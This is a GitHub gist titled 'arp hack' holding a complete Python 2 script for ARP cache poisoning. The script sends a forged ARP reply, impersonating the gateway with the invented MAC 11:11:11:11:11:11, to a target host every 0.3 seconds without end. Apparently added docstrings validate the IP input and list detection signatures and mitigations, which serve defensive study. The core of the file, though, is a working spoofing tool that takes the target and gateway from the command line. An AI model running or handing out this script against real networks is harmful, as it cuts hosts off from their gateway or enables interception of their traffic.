
@ls0f ls0f/arp.py
Created Feb 23, 2016

arp hack
#coding:utf-8
import socket
import time
import os
import sys
from struct import pack
# ARP operation codes: 16-bit fields in network byte order.
ARPOP_REQUEST = pack('!H', 1)
ARPOP_REPLY = pack('!H', 2)

# EtherType value that marks an Ethernet frame as carrying ARP.
ETHERNET_PROTOCOL_TYPE_ARP = pack('!H', 0x0806)

# Fixed start of the ARP header: hardware type 1 (Ethernet), protocol type
# 0x0800 (IPv4), hardware address length 6, protocol address length 4.
ARP_PROTOCOL_TYPE_ETHERNET_IP = (
    pack('!H', 0x0001)
    + pack('!H', 0x0800)
    + pack('!BB', 6, 4)
)
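def get_ip_mac(ip):
    """Return the MAC address the local ARP table lists for *ip*.

    Runs ``arp -n <ip>`` through a shell pipeline and returns the third
    whitespace-separated field of the last output line, stripped. The
    result is whatever that field contains; it is an empty string when the
    pipeline prints nothing.

    *ip* is interpolated into a shell command line, so it is checked first:
    only a dotted-quad IPv4 address (four decimal octets, each 0-255) is
    accepted. Anything else would be passed to the shell as written, which
    is a command-injection path for a value taken from the command line.

    Raises:
        ValueError: if *ip* is not a dotted-quad IPv4 address.
    """
    digits = frozenset("0123456789")
    octets = ip.split('.')
    is_dotted_quad = len(octets) == 4 and all(
        0 < len(octet) <= 3 and digits.issuperset(octet) and int(octet) <= 255
        for octet in octets
    )
    if not is_dotted_quad:
        raise ValueError("not a dotted-quad IPv4 address: %r" % (ip,))

    # Safe to interpolate: ip now consists of ASCII digits and dots only.
    cmd = "arp -n %s |tail -n 1 |awk '{print $3}' " % (ip,)
    pipe = os.popen(cmd)
    try:
        return pipe.read().strip()
    finally:
        # Close the pipe so the child shell is reaped instead of lingering.
        pipe.close()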
def hack(hack_ip, gate_way_ip):
    """Send forged ARP replies to one host in the name of the gateway.

    Builds a single Ethernet/ARP reply frame whose sender IP is
    *gate_way_ip* and whose sender MAC is the invented address
    11:11:11:11:11:11, addressed to the MAC that get_ip_mac() returns for
    *hack_ip*. The same frame is then sent about every 0.3 seconds in a
    loop that never exits; the socket is never closed.

    A host that accepts these replies will associate the gateway's IP with
    the invented MAC in its ARP cache (classic ARP cache poisoning).

    Reviewer notes (defensive):
      * On the wire this shows up as a steady stream of unsolicited ARP
        replies (opcode 2) for the gateway IP coming from source MAC
        11:11:11:11:11:11 -- a simple signature for ARP monitoring.
      * Switch-level Dynamic ARP Inspection or a static ARP entry for the
        gateway on the host are the usual mitigations.
      * The interface name "p3p1" is hard-coded, and AF_PACKET is a
        Linux-only socket family that normally needs root / CAP_NET_RAW.
      * ''.join() on the packed fields relies on Python 2 str semantics.
      * If get_ip_mac() returns an empty string, the int(item, 16)
        conversion below raises ValueError.
    """
    # Raw link-layer socket restricted to the ARP EtherType (0x0806).
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0806))
    sock.bind(("p3p1", socket.SOCK_RAW))
    # sock.bind(("en0", socket.SOCK_RAW))
    # Impersonate the gateway: the ARP replies carry the gateway's IP as sender.
    sender_ip = pack('!4B', *[int(x) for x in gate_way_ip.split('.')])
    target_ip = pack('!4B', *[int(x) for x in hack_ip.split('.')])
    sender_mac = pack('!6B', *(0x11,)*6)  # forged MAC address (11:11:11:11:11:11)
    # MAC of the addressed host, parsed from the colon-separated hex string
    # that get_ip_mac() returns.
    target_mac = pack('!6B', *(int(item, 16) for item in get_ip_mac(hack_ip).split(":")))
    count = 0
    arpframe = [
        # ## ETHERNET
        # destination MAC addr
        target_mac,
        # source MAC addr
        sender_mac,
        ETHERNET_PROTOCOL_TYPE_ARP,
        # ## ARP
        ARP_PROTOCOL_TYPE_ETHERNET_IP,
        # operation type
        ARPOP_REPLY,
        # sender MAC addr
        sender_mac,
        # sender IP addr
        sender_ip,
        # target hardware addr
        target_mac,
        # target IP addr
        target_ip,
    ]
    # send the ARP
    while 1:
        sock.send(''.join(arpframe))
        count += 1
        # Progress counter rewritten in place via "\r"; the message reads
        # "sent N ARP packets".
        sys.stdout.write("\r 发送了{}个arp包".format(count))
        time.sleep(0.3)
if __name__ == '__main__':
    # Two positional arguments are required: the addressed host's IP and
    # the gateway's IP. Print the usage line and exit with status 1 otherwise.
    if len(sys.argv) < 3:
        print "arp.py <hack_ip> <gate_way_ip>"
        sys.exit(1)
    hack_ip, gate_way_ip = sys.argv[1], sys.argv[2]
    hack(hack_ip, gate_way_ip)